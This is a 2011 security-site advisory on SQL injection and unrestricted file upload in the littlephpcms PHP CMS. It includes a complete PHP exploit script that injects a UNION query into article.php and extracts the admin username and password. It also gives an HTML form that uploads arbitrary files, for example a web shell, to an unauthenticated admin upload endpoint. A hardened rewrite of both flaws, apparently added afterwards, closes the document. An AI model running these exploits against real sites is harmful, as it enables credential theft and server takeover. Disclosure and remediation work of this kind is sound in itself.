littlephpcms multiple injection/upload/sensitive information leakage issues-vulnerability warning-the black bar safety net

2011-10-03T00:00:00
ID MYHACK58:62201131989
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-10-03T00:00:00

Description

Document classification: Script defense / Web apps. Published: 2011-09-30 09:26:05. Vulnerability added by: black kid.


#####################################################

Title: littlephpcms multiple injection, upload, information leakage and other vulnerabilities

Time: 2011-09-20

Team: makebugs

Author: Black kid

// pageArt.php

// ... omitted
$column = $_POST["column"];
$rownum = $_POST["rownum"];
// $column is taken straight from the POST body and concatenated into the query text
$sql = "select id,title,addtime from lpc_article where column_id=".$column;
// ... omitted

// Other files follow the same pattern (omitted).

Exp:

<?php
error_reporting(E_ERROR);
print_r("
+-----------------------+
Sql injection Vul Exploit
Exp: cfking
Home: www.webvul.com
+-----------------------+
");

if ($argc < 3) {
    print_r("
Usage:   php ".$argv[0]." host /path
Example: php ".$argv[0]." www.webvul.com /test
");
    die();
}

ob_start();
$host = $argv[1];
$path = rtrim($argv[2], "/");
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");

// Union-based injection through the unfiltered id parameter. The hex constants are the
// markers "cfkings90sec~", "-" and "~1" used below to locate the uname/upass pair in the body.
fwrite($sock, "GET $path/article.php?id=255%20and%201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: en-us,en;q=0.5\r\n");
fwrite($sock, "Connection: close\r\n\r\n");

$headers = "";
while ($str = trim(fgets($sock, 1024))) $headers .= "$str\n";
$body = "";
while (!feof($sock)) $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);

if (strpos($body, "cfkings90sec") !== false) {
    preg_match("/cfkings90sec~(.*?)~1/", $body, $arr);
    $result = explode("-", $arr[1]);
    print_r("Exploit Success!\nusername:".$result[0]."\npassword:".$result[1]."\n");
} else {
    print_r("Exploit Failed!\n");
}
?>

File upload

Vulnerable files: admin/column/upload.php and admin/Article/upload.php

Code:

$upload_dir = "../../uploads/";
$file_path = $upload_dir . $_FILES["myfile"]["name"];   // client-supplied file name used as-is
$MAX_SIZE = 20000000;
echo $_POST["buttoninfo"];
......

// The size checks only print a message; execution continues and the file is moved regardless.
if($_FILES["myfile"]["size"] > $MAX_SIZE) echo "Upload File size exceeds a predetermined size";

if($_FILES["myfile"]["size"] == 0) echo "please select the uploaded file";

if(!move_uploaded_file($_FILES["myfile"]["tmp_name"], $file_path)) echo "copy file failed, please re-upload";

Neither file applies any restriction: the size checks only print a message without stopping, and the file is moved into the web-accessible uploads directory under the exact name the client supplied.

Exp:

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<form enctype="multipart/form-data" action="http://www.sitedirsec.com/admin/column/upload.php" method="post">
  <p>After uploading, the file is reachable at the site's /uploads/ directory under the uploaded file name</p><br>
  <input type="file" name="myfile" size="20">
  <input type="submit" value="Upload">
</form>
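As an added example, not part of the original advisory or of littlephpcms itself, here are hardened counterparts of the two vulnerable snippets above (pageArt.php and upload.php): the column lookup binds validated integers through a prepared statement instead of concatenating $_POST["column"], and the upload handler enforces the size limit, allow-lists the type, and stores the file under a generated name. The table and field names (lpc_article, column_id, myfile, uploads) come from the advisory; the $pdo connection and the function names fetchArticles/saveUpload are assumptions, and the code assumes PHP 7+ with the fileinfo extension.

```php
<?php
// Added example (not littlephpcms code): hardened counterparts of the two vulnerable snippets.
// Assumes a PDO connection $pdo to the CMS database, PHP 7+ and the fileinfo extension.

// pageArt.php: validate column/rownum as integers and bind them; nothing from $_POST reaches the SQL text.
function fetchArticles(PDO $pdo, $column, $rownum)
{
    $column = filter_var($column, FILTER_VALIDATE_INT);
    $rownum = filter_var($rownum, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($column === false || $rownum === false) {
        return [];   // reject non-numeric input instead of passing it through to MySQL
    }
    $stmt = $pdo->prepare("SELECT id, title, addtime FROM lpc_article WHERE column_id = :col LIMIT :n");
    $stmt->bindValue(':col', $column, PDO::PARAM_INT);
    $stmt->bindValue(':n', $rownum, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// upload.php: enforce the size limit (instead of only echoing), allow-list the type by
// extension and real content, and store under a generated name so the client never
// chooses the path or the extension. Returns the stored file name, or false on rejection.
function saveUpload(array $file, $uploadDir, $maxSize = 20000000)
{
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) return false;
    if ($file['size'] <= 0 || $file['size'] > $maxSize) return false;
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) return false;   // .php, .phtml, .htaccess and the like never pass
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowed[$ext]) return false;   // content must match
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) return false;
    chmod($dest, 0644);   // readable, not executable
    return $stored;
}

// Wiring in the handlers (hypothetical):
// $rows = fetchArticles($pdo, $_POST['column'], $_POST['rownum']);
// $name = saveUpload($_FILES['myfile'], __DIR__ . '/../../uploads');
```

Even with these checks, serve /uploads/ from a location where the web server does not execute scripts, and keep the admin upload endpoints behind the CMS's authentication.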